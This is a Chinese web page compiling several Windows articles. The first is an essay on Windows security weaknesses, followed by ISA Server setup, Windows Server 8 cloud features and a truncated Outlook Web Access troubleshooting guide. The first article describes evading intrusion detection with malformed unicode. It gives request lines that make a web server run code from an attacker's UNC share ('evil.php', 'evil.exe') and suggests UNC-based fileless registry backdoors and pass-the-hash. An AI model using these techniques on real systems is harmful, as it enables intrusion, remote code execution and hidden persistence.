首页 > 实用文档 > 其他范文

WIN技巧：为什么WIN不安全

2023-09-02 07:58:03| 收藏本文下载本文作者：阿玲

下面是小编为大家推荐的WIN技巧：为什么WIN不安全（共含8篇），欢迎阅读，希望大家能够喜欢。同时，但愿您也能像本文投稿人“阿玲”一样，积极向本站投稿分享好文章。

WIN技巧：为什么WIN不安全

篇1：WIN技巧：为什么WIN不安全

这篇文章早就想写了，只是题目太大了，所以一直不敢写，高手可以厚积薄发，我只能积多少发多少了，

关于Windows 和*nix 谁更安全的讨论很多。*nix 大家知道存在着suid之类的死穴，那么Windows的哪些特点始终与安全问题纠结在一起呢？

一：代码庞大，代码重用

有一个“小程序定理”：程序中的bug 和程序大小成正比。还有一句谚语：凡可能出错的地方就一定会出错。微软的程序员不是神，那么多行代码，还要求软件工程学上的完美，

代码重用……昨天ilsy跟我提到那个ldap溢出，其实就是一个根本不该犯的错误，但是仍然犯了。要求代码重用就意味着在某个版本上出现的问题，就可能会在后续版本中都有问题，其他重用此代码的程序中也可能会有问题。

曾经有人说Windows .net出来，搞Windows 安全的就没饭吃了，我看一定不会，盖兹不会那么残忍。

二：盲目追求易用性和兼容性

毕竟是开公司，当然是怎么赚钱最多就怎么搞，听casper说微软花上百万去研究按钮的

光源从哪个角度照下来好看。好用的东西，傻瓜的东西，大家当然愿意买。所以默认就什么都支持，什么都包含，什么都关联什么都兼容。

三：废话不说了，说点实在的。

1、unicode的支持

IIS的unicode漏洞我就不多说了，其实除了IIS，其他还有不少Windows上的web 服务器存在类似问题。因为对unicode 的解码是系统内核完成的，真要想把错误解码问题解决，估计花钱不会少。我发现微软其实并没有在unicode 漏洞的补丁中真正把错误解码纠正，而只是简单过滤了一些危险的字符编码。主要是不允许“.”和“/”或者“”在一起出现，否则就报错。所以我们仍然能用错误解码来做一些事情，譬如说对付NIDS。把我们要扫描或者利用的http请求转换成错误编码格式，大多数的NIDS都是不能识别的。大家可以试验一下，看看是不是有哪家的NIDS 可以检测到这个。附录1是我自己搞的一个Windows 中文版unicode错误解码表，不一定很全，大家可以参考。有兴趣的可以用这张表搞一个扫描器，对每一个字符随机使用正常unicode编码、utf8 编码和错误解码，看看是否还有什么NIDS可以识别。

我甚至相信在XP中，这个问题也未必会得到根本的解决。

2、扩展名欺骗

我们都认为Windows下文件性质由扩展名决定，也很容易相信一个doc（关掉宏的话）或者gif文件是无害的。但事实上，Windows不完全是按照扩展名来处理文件的，它会根据文件头部的信息对文件性质作初步的判断。NT 4就曾经出现过这样的问题：对于一个EXE 文件，当命名为.DOC时，双击运行，系统仍然按照EXE文件来加载执行！即使Windows 2000下，我们把一个EXE 文件扩展名改成任意的，在命令提示符下仍然会当作EXE文件运行：

C:>test.exe

only test !

C:>ren test.exe test.txt

C:>test.txt

only test !

C:>ren test.txt test.any

C:>test.any

only test !

幸好在资源管理器里双击运行时不存在这样的问题。但是EXE文件扩展名改为.com .cmd .bat .pif .scr仍然能正常双击运行，还有一定欺骗性。不少邮件病毒就是用了类似的手段。

3、8.3文件名，16位子系统，POSIX子系统，OS2子系统

能运行16位程序、OS2、POSIX 程序也是Windows NT/2000的一个卖点。但是由于对这些的支持需要使用一些系统级的 Privilege，也可以认为是某种意义上的suid，所以造成了安全隐患。历史上NT 4就曾经由于POSIX 子系统的问题出现过提升权限的漏洞。一般的系统加固手册中都会要求关掉这些支持。

Dos对长文件名会作截短处理，Windows NT/2000虽然支持长文件名，但默认也支持截短后的8.3 格式。当我们对某个文件进行基于文件名的访问控制的时候，就有可能通过使用截短的8.3 文件名来绕过控制。对于某些设计未考虑此问题的WEB服务器来说，就可能导致CGI源码泄漏。

4、“/”“”不分

Windows 下一般使用“”表示目录，但是对“/”也可以接受，这和*nix仅仅支持“/”是不同的，

在编写asp、php等的时候，以及在写WEB 服务器之类程序的时候，如果没有把这两种都考虑到，往往会导致对WEB上级目录的越权访问。以前Win32 Apache就有这个问题。

5、UNC路径支持

对UNC 路径的支持可以使我们很简单的访问远程文件，但它所带来的安全问题也的确是太多了。首先，UNC 几乎在任何地方都可以被使用，可以有无数种方法欺骗用户访问入侵者的机器，而Windows NT/2000 的认证机制为了易用性，默认会在你访问的时候主动把当前用户密码散列值发送过去，对于没有加固的系统来说，散列值和密码本身几乎是没有什么区别的。

Windows NT/2000上安装Apache + php后，默认存在一个“/cgi-bin/php.exe?”的漏洞，漏洞发现者告诉我们这个问题可以被用来察看系统的任意文本，但事实上这个漏洞完全可以获得远程shell。因为我们可以这样：

cgi-bin/php.exe?myipshareevil.php。

如果*nix上存在这个问题，就仅仅只能用来看文件DD除非你能传文件上去。

类似的，在一些漏洞的利用中，即使用户对所有目录都不可写，我们仍然可以运行指定的程序：host/scripts/../../cmd.exe?/c+myhostshareevil.exe

同样还可以用UNC 路径来安装真正无文件的后门，只要在注册表某个可以自启动的项上或者计划任务列表中添加一个指向UNC路径的程序即可。这个文件是不存在于本地硬盘上的，甚至也不会在临时文件夹里，可以躲过很多审核工具。

要去除对UNC路径的支持，可以禁用DeviceMup设备。

6、设备文件名问题

*nix 的一个特色是“一切皆文件”，大概是受其影响，Windows NT/2000的很多设备也可以通过字符链接作为文件访问。有些程序在编写的时候，为防止对任意驱动器的访问的控制手段设计考虑不足，如果我们通过“.D:”这样的方式来试图访问D:盘，就可能绕过一些编写不当的程序。

为了向上兼容，DOS设备文件名，如“PRN”、“CON”等在Windows NT/2000下仍然被支持。9X 下可以通过简单的直接对DOS 设备文件名的访问导致蓝屏，Windows NT/2000下做了一些处理，但是很多程序还是存在类似的问题，譬如Lotus Domino Server、OE等，甚至IIS在某些特殊情况下也会受影响导致拒绝服务。

又因为这些设备文件名是“无处不在”的，当我们需要某种类型文件来做点事情的时候就用得上了。先假设存在一个.plx的溢出，但是WEB目录下根本没有.plx 文件，这时候我们就可以用con.plx这样的文件来传递溢出代码了。

7、注册表庞大而复杂

注册表对于Windows 来说太重要了，也有太多的东西了，其中还有那么多是未公开的。如果在注册表里留个后门，弄得好的话，几乎是不可能被审核出来的。所以定期备份注册表文件对一个Windows系统管理员来说是很重要的。

8、WSH，script

WSH对象实在太强大了，再加上系统脚本引擎是默认安装的，又在包括IE、Office等的MS软件中被广泛支持，所以难免出问题。纵观IE，outlook的漏洞，很多都和这个有关。

9、系统权限分配繁冗

Windows NT/2000中几乎每个东西都可以设置权限，每一个对象，注册表项，设备……这么庞大的访问控制列表，实在难以一一审核，而其中很多都可以被用来作为后门。

10、默认兼容lanman验证

早在Windows NT 4.0的时代，就有人提出了传递散列值的进攻方法。因为在lanman验证方法中只是简单的比对MD 4散列值。那么理论上只要我们有了帐号和口令的散列值就可以通过lanman 验证，而不需要用l0pht Crack之类的工具去解出口令。由于这种攻击方式需要从根本上改动验证过程，而修改Windows内核过于困难，当时的发现者是使用修改Samba的方法来实现的，而且代码并未公开。最近有人对此提出可一个新思路，并公开了代码，可以在各种平台上实现，使得这个问题的风险大大增加了。所以在作系统加固的时候一定要把验证方式改掉。

11、设计失误

Windows上有很多设计失误，譬如帐号锁定和IIS的安全设计之间就有冲突（coolweis最早提出），一旦启用帐号锁定策略，我们可以对IUSER_和 IWAM_进行穷举，这两个帐号锁定后，任何人都无法访问IIS，这样很小的代价就实现了DoS。类似的问题还有不少。

篇2：WIN技巧：安装ISAServer

2.2 安装ISA Server

为了在服务器计算机上完成ISA Server的安装，首先必须安装网络并且根据选择的网络拓扑结构配置连接，如果采用阵列或企业策略，还必须初始化企业，将阵列架构信息安装到Active Directory存储器中。在ISA Server的实际安装过程中，需要构造本地地址表(LAT)，列出内部网络地址的范围。

本节学习目标

l 为安装ISA Server准备服务器计算机

l 初始化企业并描述其用途

l 构造LAT并描述其功能

l 完成ISA Server的安装

l 排除ISA Server安装中的故障

估计学习时间：50分钟

2.2.1 安装ISA Server之前

安装ISA Server之前，必须安装硬件并配置将要运行ISA Server的计算机的软件。

2.2.1.1 安装网络适配器

可以选择用直接连接(例如T1、T3、xDSL或电缆调制解调器)或者拨号连接将网络与Internet相连。如果选择直接连接，需要安装并配置一个外部网络适配器。

为外部网络适配器配置TCP/IP属性时，与ISP核对一下正确的设置。尤其需要把子网掩码和分配给外部适配器、默认网关和DNS服务器的IP地址。在有些情况下，ISP可能用动态主机配置协议( DHCP)对客户地址进行动态分配。

一般来说，ISA Server只有一个IP默认网关。应当只在外部网络适配器上配置默认网关的IP地址，而不是在内部网络适配器上。内部网卡的Default Gateway设置为空即可。

参阅Windows 2000 Server帮助中的指导来安装网络适配器。

2.2.1.2 TCP/IP设置

为任何网络适配器设置TCP/IP属性时，都应该为ISA Server计算机输入一个永久保留的IP地址，并为局域网输入一个适当的子网掩码。既然网络内部客户会把ISA Server计算机的地址指定作为默认网关，而且DHCP可以重新设置ISA Server计算机的地址，就不能对服务器内部网络适配器使用DHCP来分配地址。然而，外部NIC的地址可以是启用DHCP的，也可以是静态定义的，再加上默认网关和DNS设置。

Windows 2000根据适配器的单一MAC地址识别加载到系统上的各个适配器。可以运行ipconfig /all命令，以得到ISA Server计算机的两个网络适配器的媒介访问控制(MAC)地址，并确定各个网卡配置正确。

配置完适配器和IP地址后，应该使用Ping程序以测试与其他计算机的连通性。如果可以成功地从ISA Server计算机ping到内部网络客户，内部网络适配器配置就是正确的。如果可以从ISA Server计算机ping到您的上游Internet网关、ISP的DNS服务器或任何Internet地址，外部网络适配器的配置就是正确的。检验网络连通性后，可以通过nslookup 实用程序查找与网络地址相关的IP地址来检验域名解析，例如nslookup www.microsoft.com。

2.2.1.3 安装调制解调器或ISDN适配器

如果决定用拨号连接而不是通过外部网络适配器直接连接到Internet，您必须为服务器配备调制解调器或ISDN适配器。

依靠ISDN适配器，您或许无法在Windows 2000下浏览两个ISDN通道。一般来说，ISDN网卡驱动程序为第二通道管理基于带宽的连通性。您不能在Windows 2000下使用Routing and Remote Access控制台管理驱动程序。请确保安装了网络适配器以配置两个通道，并确保ISP支持两个通道的连接。

参阅Windows 2000Server Help的指令来安装ISDN适配器或调制解调器。

2.2.2 Windows 2000路由表

安装ISA Server之前，先配置ISA Server计算机的路由表，其中包括内部网络中的所有IP地址范围。可以用Windows 2000路由程序来浏览并配置路由表。还可以使用Windows 2000 Routing and Remote Access控制台。然而，必须首先配置并启动Routing and Remote Access Service。接下来，在安装过程中ISA可以根据您的Windows 2000路由表构建LAT。如果上述操作有误，可以随时手工改正LAT。

正确配置LAT保证了ISA Server知道使用哪个网络适配器来访问内部网络的不同部分。如果未能正确配置路由表，就可能无法正确构建ISA Server LAT。这可能导致客户对内部IP地址的请求被错误地路由到Internet上，或者通过防火墙服务被重定向。

如果需要的话，应该手工编辑LAT使其涵盖所有其他的网络，包括那些通过内部路由器的网络。这样，ISA Server和防火墙客户端就能正确地判断什么时候使用ISA Server以及什么时候直接访问某一资源。

2.2.3 安装ISA Server

将ISA Server光盘插入驱动器时，就会显示ISA Server Setup屏幕，从该屏幕上调用Setup，

ISA Server Setup屏幕如图2.9所示。

l 如果是第一次将ISA Server安装成阵列成员，那么必须首先运行ISA Server Enterprise Initialization Tool。

l 如果安装独立的服务器，或者如果以前在企业中安装过ISA Server，就可以选择Install ISA Server。

初始化企业

用ISA Server企业版，可以将ISA Server计算机配置为阵列成员。将ISA Server计算机安装成阵列成员之前，必须将ISA Server架构更新安装到域控制器的Active Directory架构上。ISA Server包含用来安装ISA Server架构更新的Enterprise Initialization 实用程序。可以在ISA Server Setup屏幕上找到这个程序，如图2.10所示。

ISA Server架构更新应用之后，ISA Server安装到计算机的所有后续步骤都使用更新的Active Directory架构。

注意为了安装ISA Server架构更新，您必须是Enterprise Admins组中的成员。参阅Windows 2000 Server 帮助，以获得有关用户和组许可的特殊指令。

当完成ISA Server Enterprise Initialization Tool操作时，ISA Server架构更新就已经安装到了Active Directory架构下。现在可以将ISA Server安装成阵列成员，创建ISA Server应该加入的阵列。

注意为阵列中的第一台计算机创建阵列。加到Active Directory存储器中的信息可能会花一段时间进行复制。因此建议您创建另一个阵列之前先等待一段时间。

2.2.4 安装程序

安装ISA Server时，要求您提供以下信息。

要点安装ISA Server之前必须安装Windows 2000 Service Pack 1或更高版本。

l 安装序列号这是位于ISA Server 安装光盘盒背面的10个数字。

l 安装选项您可以选择典型(Typical)安装、完全(Full)安装，或自定义(Custom)安装。表2.6显示典型安装中需要安装的组件。完全安装将安装所有的选项；自定义安装允许您选择单独的组件。

l 选择阵列如果以前初始化过企业，可以选择加入哪个阵列。如果没有初始化企业，ISA Server将被安装成独立的服务器。

l 模式可以选择将ISA Server安装成防火墙模式、缓存模式或集成模式。

l 缓存配置如果将ISA Server安装为集成或缓存模式，必须配置使用哪个缓存驱动器以及缓存的大小。

图2.11所示是配置缓存设置的对话框。

l 本地地址表配置如果将ISA Server配置成集成模式或防火墙模式，必须配置包含在本地地址表中的地址范围。

2.2.5 构建本地地址表

如果将ISA Server安装成防火墙模式或集成模式，作为安装过程的一部分，必须指定本地地址表，或者说LAT。LAT表格列出了ISA Server计算机后内部网络使用的所有内部IP地址范围。ISA Server利用LAT来控制内部网络的机器如何与外部网络通信。

一般来说，LAT包括与ISA Server计算机上内部网卡有关的所有IP地址，以及Internet编号授权委员会(IANA)定义的专用IP地址范围。图2.12所示是在安装过程中配置LAT的对话框。

ISA Server能够以您的Windows 2000路由表为基础构建LAT。您还可以根据IANA的RFC1918选择专用IP地址范围。这3组地址专供内部网之用，从不在公用Internet上使用。

默认的LAT包含通常所说的专用IP地址。这些地址列在本地路由表中。由于ISA Server读取Windows 2000 Server路由表的方式，默认的LAT可能不包括组织的所有地址。您可以手工添加这些地址。还可以将不属于网络的地址添加为本地地址。

LAT集中保存在ISA Server计算机上。防火墙客户端按预设时间间隔自动地下载和接收LAT更新。防火墙客户端请求某个对象时，客户端会核对LAT。如果IP地址请求在LAT内，防火墙客户端就可以直接请求该对象。如果该IP地址不在LAT内，客户端会要求ISA Server计算机代表它请求那个对象。

安全网络地址转换客户端没有LAT的本地复本，因此当一个安全网络地址转换客户端请求某一对象时，该请求会被发送给ISA Server。如果该请求是传给一个外部IP地址，ISA Server会代表客户发出请求。

Windows 2000 路由表

ISA Server构建LAT时运用Windows 2000路由表判断内部网络的哪些地址范围是内部的。如果您未能正确配置路由表，就可能无法正确构建ISA Server LAT。结果，客户端对内部IP地址的要求被路由到Internet上，或者通过防火墙服务被重定向。您可以用Windows 2000路由实用程序来配置相应的路由表。接下来，在安装过程中可以根据您的Windows 2000路由表构建LAT。

2.2.6 默认配置

篇3：WIN技巧：Windows 防火墙

小公司和大企业都将可以使用Windows Server 8来建立自己的云服务，微软公司的一份白皮书揭示了应用即将发布的服务器操作系统来构建IaaS平台的细节。

在通过 Windows Azure平台提供PaaS云服务和两个SaaS解决方案――Office 365及Dynamics CRM Online――之后，微软准备提供另一新选择，为希望建立自己的私有IaaS云的客户提供基于Windows Server 8的解决方案。除Windows Server之外，这个解决方案还使用了AppFabric和System Center，下图展示了细节：

Windows Server 8 (WS8)允许企业从传统的或虚拟化的数据中心转移到“云端”，WS8能够自动分配资源，并允许多用户创建彼此隔离的虚拟机(VM)，以保证可扩展性和可管理性。不仅如此，通过Live Migration，可以在集群、子网或WAN子网络间的Hyper-V主机中迁移多个运行中的虚拟机，而无需停止服务或重新配置IP地址，Storage Migration可用来在网络间不停机地移动虚拟化硬盘，微软在BUILD 上介绍了上述特性。Live Migration允许企业从内部的基于Hyper-V的虚拟化解决方案迁移到私有的或托管云上，而无需停机，

在安全方面，Hyper-V Extensible交换机提供了下述特性：私有虚拟局域网，ARP攻击/欺骗保护，DHCP欺骗保护，虚拟端口访问列表，和支持VLAN trunk模式。WS8同时提供资源计量，包括静态计量――虚拟CPU数量或分配的磁盘空间――和动态计量，如CPU使用率或网络带宽使用率。同时还提供一系列性能计数器――SMB2文件共享利用率，RDMA利用率，网络流量和虚拟机指标――用以量化各种资源的性能。

WS8支持设定QoS策略，例如，可以设定SLA来保证最小的和最大的网络带宽，因此客户可以免受其他客户高带宽使用的影响，对于主机提供商来说，设定网络带宽SLA也可以保护自身，避免部分软件缺陷消耗过多带宽。SLA是自动强制执行的。

WS8云可以通过Windows PowerShell 3管理，Windows PowerShell 3 预定义了数千个cmdlet，可用于执行不同的云管理命令和Windows PowerShell Workflows，Windows PowerShell Workflow是批处理命令的现代替代品。

微软推荐将WS8用于各种规模的云，从只需要几十个服务器的中等规模的业务，到有几百台服务器的企业，再到拥有数千台服务器的主机提供商。

白皮书“应用Windows Server 8构建基础设施服务(IaaS)”包括了关于如何应用Windows Server 8创建云服务的更多信息，包含可扩展性、可访问性和可扩充性。

篇4：WIN技巧：ExchangeOutlookWebAccess疑难解答

引言

Microsoft Exchange 2000 Server 中的 Microsoft Outlook Web Access 提供了通过 Web 浏览器访问 Exchange 邮箱数据的方便功能，管理员可以利用本文解决使用户无法成功地登录并使用 Outlook Web Access 的配置问题和常见网络问题。

本文是为熟悉 HTTP 和基本的 Microsoft Windows 2000 概念的 Exchange 2000 或 Outlook Web Access 管理员而编写的。熟悉 Microsoft Internet 信息服务 (IIS) 也将有助于您进行疑难解答。

本文提供的五个步骤用来对最常见的 Outlook Web Access 登录错误进行疑难解答。这些步骤将帮助您确定：您可能遇到了什么类型的错误。该错误意味着什么。该错误的可能原因。

即使所有这些步骤都无法帮助您解决问题，您也可以在拨打 Microsoft 产品支持服务电话时使用您通过这些步骤搜集到的信息。在进行疑难解答时，请清楚记录每一步，因为您可能需要返回来参考这些步骤，或者需要将这些信息提供给 Microsoft 产品支持服务代表。

注本文档主要讲述造成您或您的客户根本无法使用 Outlook Web Access 的问题（如登录失败或无法看到您文件夹中的内容），而非 Outlook Web Access 会话中可能出现的问题。

本文包括以下步骤，这些步骤可帮助您进行疑难解答。疑难解答最佳做法除讲述最常见错误解决方案外，本步骤还讲述可靠的管理办法，这些办法可确保 Outlook Web Access 具有一贯的性能。有什么症状？本步骤通过描述最常见的问题类别，帮助管理员澄清问题的原因。Microsoft 产品支持服务使用这些类别来对 Outlook Web Access 进行疑难解答。这些症状说明了什么？管理员确定问题的症状后，本步骤可帮助确定问题的原因和一些可能的解决方法。其他疑难解答步骤本步骤讲述更具体的疑难解答方法，包括检查过去造成 Outlook Web Access 错误的 Exchange 2000 和 Microsoft Windows 2000 组件。疑难解答工具本步骤概括介绍 Windows 2000 和 Exchange 2000 工具，这些工具可帮助管理员进一步解决 Outlook Web Access 问题。疑难解答最佳做法

下面几节讲述 Outlook Web Access 的一些管理技巧，Microsoft 产品支持服务人员成功地使用这些技巧对常见错误进行疑难解答。每次仅更改一项配置

需要记住的最重要疑难解答技巧是：每次只应更改一项设置或配置。通过只更改一项设置，您可以仔细跟踪更改前后的行为，从而可确定是哪一项更改解决了问题。如果您需要与产品支持服务人员联系，每次只更改一项设置还可帮助他们缩小问题范围。检查输入

最常见的 Outlook Web Access 登录问题之一是键入密码错误。如果用户不能访问其邮箱，请让该用户再次确定他或她是否犯了打字错误。还要确保没有启用 CAPS LOCK 键。使用单个用户帐户

确保对所有测试使用同一个非管理员帐户。原则上，应在开始疑难解答前创建此帐户，而不应使用现有帐户。通过使用新帐户，您可以确保该帐户不存在旧问题。如果使用新帐户解决了问题

如果仅一个用户帐户发生了某个问题，请将该用户的 Active Directory 目录服务配置选项与另一正常用户帐户的配置选项相比较。在多个客户机上验证问题

有时，某个问题可能只在某一特定的客户机上发生。验证您是否可以在多台客户机上重现此问题。如果发现只能在一台客户机上重现此问题，则可以大大缩小问题原因的范围。尝试使用不同的浏览器或电子邮件程序登录

如果最初是在使用 Microsoft Internet Explorer 5 与 Outlook Web Access 时遇到了问题，请尝试使用 Netscape Navigator。如果最初是在使用 Netscape Navigator 时遇到了问题，请尝试使用 Internet Explorer。

Outlook Web Access 有两种形式，即“胖”客户端形式和“延伸”客户端形式。在运行 Microsoft Windows 或 Sun Solaris 的计算机上运行 Internet Explorer 5 或其更高版本的用户使用胖客户端，它为用户提供全部功能。所有其他浏览器（如 Internet Explorer 4.x 或 Netscape Navigator）的用户使用延伸客户端。

胖客户端利用运行 Internet Explorer 5 或其更高版本的计算机上的现有控件，来与 Exchange 服务器一起执行自定义请求。Internet Explorer 5 或其更高版本使用动态超文本标记语言 (DHTML) 来呈现内容项，并使 Outlook Web Access 的外观类似于 Outlook。

延伸客户端使用较简单的 HTML 3.2 和欧洲计算机制造商协会 (ECMA) 脚本来呈现视图和内容项。Internet Explorer 4.x、Netscape Navigator、Opera、Pocket Internet Explorer 和所有其他浏览器都使用延伸客户端。

不同的浏览器也都分别支持不同的身份验证机制。例如，如果您不能使用 Internet Explorer 5 登录，但可以使用 Pocket Internet Explorer 登录，则可能是贵组织的 NTLM 身份验证或 Kerberos 身份验证中的配置有问题。

您还可以使用 Outlook（带有 Exchange Server 服务）或 Outlook Express（采用一个邮政协议 [POP] 或 Internet 邮件访问协议 [IMAP] 帐户）来访问有问题的邮箱。如果使用这些非 Outlook Web Access 客户程序无法访问该帐户，则该问题可能并非特定于 Outlook Web Access。请求身份验证时使用 <域><用户名>格式

当用户在 Outlook Web Access 中访问邮箱时，他们的 Web 浏览器会打开一个对话框，提示他们输入凭据。此对话框可能有两个字段（用户名和密码），或者可能有三个（用户名、密码和域），具体取决于用户当前使用的浏览器的类型和版本。用户名的默认形式是：域名，后面是反斜杠，再后面是用户的别名或用户名。在对错误进行疑难解答时，如果您在贵组织中配置了非默认身份验证选项（如通用原则名称 [UPN] 用户名，或默认域），请不要使用这些选项。每次都要使用 <域><用户名>格式开始疑难解答。如果使用 <域><用户名>格式解决了问题

如果在使用 <域><用户名>格式时可以访问邮箱，但在使用 UPN 用户名或默认域时不能访问邮箱，请检查 Exchange System Manager（Exchange 系统管理器）中的默认域设置。

下面的步骤讲述如何验证默认 HTTP 虚拟服务器以及您或您的组织创建的任何 HTTP 虚拟服务器上的默认域设置。您必须通过 Internet 服务管理器来管理默认的 HTTP 虚拟服务器，而使用 System Manager（系统管理器）管理您创建的任何 HTTP 虚拟服务器。

在 Internet 服务管理器中验证默认域设置（对默认 HTTP 虚拟服务器）单击开始，指向程序，再指向管理工具，然后单击 Internet 服务管理器。如果需要，请单击展开本地计算机对象，然后单击展开 Web 站点。右键单击默认 Web 站点，然后单击属性。在目录安全性选项卡上的匿名访问和验证控件下，单击编辑。在身份验证方法中，在已验证身份的访问下，在默认域中，验证您的域是否已正确列出，没有打字错误或拼写错误。对于 UPN 用户名，只应列出一个反斜杠 ()。

在“系统管理器”中验证默认域设置（对所有其他 HTTP 虚拟服务器）单击开始，指向程序，再指向 Microsoft Exchange，然后单击 System Manager（系统管理器）。单击展开管理组、有问题的管理组、服务器、有问题的 Exchange 服务器、协议，然后单击 HTTP。右键单击有问题的 HTTP 虚拟服务器，然后单击属性。在访问选项卡上，单击身份验证。在身份验证方法中，在默认域中，验证您的域是否已正确列出，没有打字错误或拼写错误。对于 UPN 用户名，只应列出一个反斜杠 ()。

如果正确列出了默认域，则可能未将设置复制到 Exchange 服务器的元数据库中。有关更多信息，请参见本文中下面的“确保复制 IIS 设置”。

有关使用 UPN 登录的更多信息，请参见 Microsoft 知识库文章 Q243280“Users Can Log in Using User Name or User Principal Name”（用户可使用用户名或用户主要名称登录），网址是：go.microsoft.com/fwlink/?LinkId=3052&ID=243280。使用完整的 URL 登录到邮箱

使用 Outlook Web Access，用户不需要知道其邮箱的完整 URL 就可以登录。用户键入 <服务器名>/exchange，然后在得到浏览器提示后，输入他们的用户名和密码。Exchange 使用用户名和密码信息来在 Active Directory 中查找用户邮箱的完整 URL。Exchange 然后将用户路由到正确的邮箱。

在进行疑难解答时，请始终使用邮箱的完整 URL，例如，<服务器名>/exchange/<用户名>。在您使用此完整 URL 时，Exchange 不执行使用简短 URL 时需要执行的 Active Directory 查找过程。如果使用完整 URL 登录解决了问题

如果您可以使用完整 URL 访问邮箱，但不能使用简短的 URL 访问邮箱，则访问问题可能与身份验证有关。仅使用基本身份验证

如果用户无法访问某个资源，请将访问该资源的身份验证方法设置为“基本”身份验证。如果您认为访问问题的原因在于权限配置不当，则此步骤尤为重要。

下面的步骤讲述如何在默认 HTTP 虚拟服务器及您或您的组织创建的任何 HTTP 虚拟服务器上配置身份验证设置。您必须通过 Internet 服务管理器来管理默认的 HTTP 虚拟服务器，而使用系统管理器管理您创建的任何 HTTP 虚拟服务器。

安全警告这些步骤只能用于疑难解答。为安全起见，除非您还使用了安全套接字层 (SSL) 加密，否则一定不要将基本身份验证选作您的唯一身份验证方法。

在 Internet 服务管理器中设置基本身份验证（对默认 HTTP 虚拟服务器）单击开始，指向程序，再指向管理工具，然后单击 Internet 服务管理器。如果需要，请单击展开本地计算机对象，然后单击展开 Web 站点。右键单击默认 Web 站点，然后单击属性。在目录安全性选项卡上的匿名访问和验证控件下，单击编辑。在身份验证方法中，在已验证身份的访问下，单击选择基本身份验证。在默认域中，键入贵组织的域名。如果需要，单击清除所有其他身份验证方法。

在系统管理器中验证默认域设置（对所有其他 HTTP 虚拟服务器）单击开始，指向程序，再指向 Microsoft Exchange，然后单击 System Manager（系统管理器）。单击展开管理组、有问题的管理组、服务器、有问题的 Exchange 服务器、协议，然后单击 HTTP。右键单击有问题的 HTTP 虚拟服务器，然后单击属性。在访问选项卡上，单击身份验证。在身份验证方法中，单击选择基本身份验证。在默认域中，键入贵组织的域名。如果需要，请单击清除匿名访问和集成的 Windows 身份验证。

您可能至少需要等 15 分钟来让您的身份验证设置复制到 Exchange 元数据库。有关更多信息，请参见本文中下面的“确保复制 IIS 设置”。如果使用基本身份验证解决了问题

如果使用基本身份验证而不使用任何其他身份验证方法允许您访问邮箱，则访问问题或者是由集成的 Windows 身份验证引起的，或者是由匿名访问引起的。

集成的 Windows 身份验证即 Exchange 服务器上注册的 Windows 2000 身份验证机制，例如 NTLM 和 Kerberos。NTLM 仅在 Internet Explorer 4.x 及更高版本中受支持。Kerberos 仅在 Internet Explorer 5 及其更高版本中受支持。

如果在您选择“集成的 Windows 身份验证”后发生了此问题，请检查是否在 Internet Explorer 5 或其更高版本以外的其他浏览器中发生此问题（例如 Internet Explorer 4.x），因为这一浏览器不支持集成的 Windows 身份验证。如果在 Internet Explorer 4.x 等浏览器中不发生此问题，则此访问问题很可能与集成的 Windows 身份验证有关。有什么症状？

您看到的什么情况表明 Outlook Web Access 不能正常使用？本节讲述最常见的访问问题症状。 HTTP 和 IIS 错误

HTTP 错误是用户尝试登录 Outlook Web Access 时最常见的症状。因为浏览器中可能收到的 HTTP 错误有若干种不同情况，所以错误代码对于确定是什么错误很有用。如前所述，即使错误代码不能帮助您解决问题，也可能对 Microsoft 产品支持服务人员有帮助。

如果您尝试访问 Outlook Web Access 时在浏览器中看到了错误，请记下错误代码。例如，在图 1 中所示的 HTTP 错误 HTTP/1.1 404 Not Found（HTTP/1.1 404 未找到）中，404 就是错误代码。

如果您的浏览器不支持内嵌框，请单击此处在单独的页中查看。

图 1 一个 HTTP 错误

除 HTTP 错误代码外，IIS 也会在 Web 浏览器中显示它自己的错误代码。这些错误代码一般表示为两组数字，例如： -2146893055 (0x80090301)“友好”HTTP 错误消息

Microsoft Internet Explorer 有一种功能可让用户只显示“友好”错误消息，即措辞简明并且没有错误代码的消息。如果您认为您收到了一条错误消息，但看不到错误代码，则可能在出现问题的浏览器上激活了友好 HTTP 错误消息（此功能在默认情况下为关闭状态）。下面的步骤讲述如何关闭友好 HTTP 错误消息。

关闭 Internet Explorer 中的友好 HTTP 错误消息在 Internet Explorer 中的工具菜单中，单击 Internet 选项。单击高级选项卡。在浏览下，单击清除显示友好 HTTP 错误消息。 Outlook Web Access 对话框中的错误

用户可能会看到图 2 中所示的另一种 IIS 或 HTTP 错误。在这种错误中，Outlook Web Access 检测到一个 HTTP 或 IIS 问题，然后显示一个错误对话框，而不是在浏览器窗口中显示一个错误。

图 2 Outlook Web Access 显示的错误对话框示例

如想在此类情况下看到完整的错误，请捕捉您的客户端和服务器之间的一个 HTTP 通讯快照。错误代码很可能会出现在该快照中。 Outlook Web Access 中的不正常行为

Outlook Web Access 中的不正常行为是另一种表明有问题的迹象。下面是一些不正常行为的示例：左框架中的导航栏正常显示，但显示文件夹内容的右框架不能正常显示。内容框架中正在加载…这一句的显示时间特别长，而该文件夹中的内容项列表一直不显示。您收到一个脚本错误。

在 Internet Explorer 中，您可以配置浏览器，使其向用户显示脚本错误（默认情况此功能为关闭状态）。显示脚本错误可帮助管理员对 Outlook Web Access 错误进行疑难解答。

在 Internet Explorer 中显示脚本错误在 Internet Explorer 中的工具菜单中，单击 Internet 选项。单击高级选项卡。在浏览下，单击选择显示每个脚本错误的通知。这些症状说明了什么？

在确定您遇到的错误的症状后，如何确定这些症状的原因？本节按类别列出了常见 Outlook Web Access 错误症状，并就可能的原因和解决方法为您提供了建议。错误类别：HTTP 错误

本节讲述 HTTP 错误症状及其可能的原因和解决方法。症状 401 拒绝访问 401 登录失败可能的原因和解决方法用户名或密码不正确。验证是否有打字错误以及是否按下了 CAPS LOCK 键。用户名输入格式不正确。例如，如果服务器未配置为使用 UPN 登录，则您会在使用一个电子邮件地址登录 Outlook Web Access 时看到此错误。您刚创建了此用户帐户。该帐户需要几分钟才能正确初始化。若要加快此过程，请尝试向该帐户发送一个邮件，或使用由 Exchange 服务器为其提供服务的 Outlook 配置文件登录。如果在您访问 <服务器>/exchange 时收到一个 401 拒绝访问错误，在访问 <服务器>/exchange/<用户名>时收到 404 未找到错误，则您在尝试验证其身份的用户可能没有一个简单邮件传输协议 (SMTP) 地址与在 Exchange 系统管理器中虚拟目录的属性中设置的 SMTP 域相匹配。有关更多信息，请参见 Microsoft 知识库文章 Q293386“XWEB: Error Message: HTTP/1.0 401 or 404”（XWEB：错误消息：HTTP/1.0 401 或 404），网址是 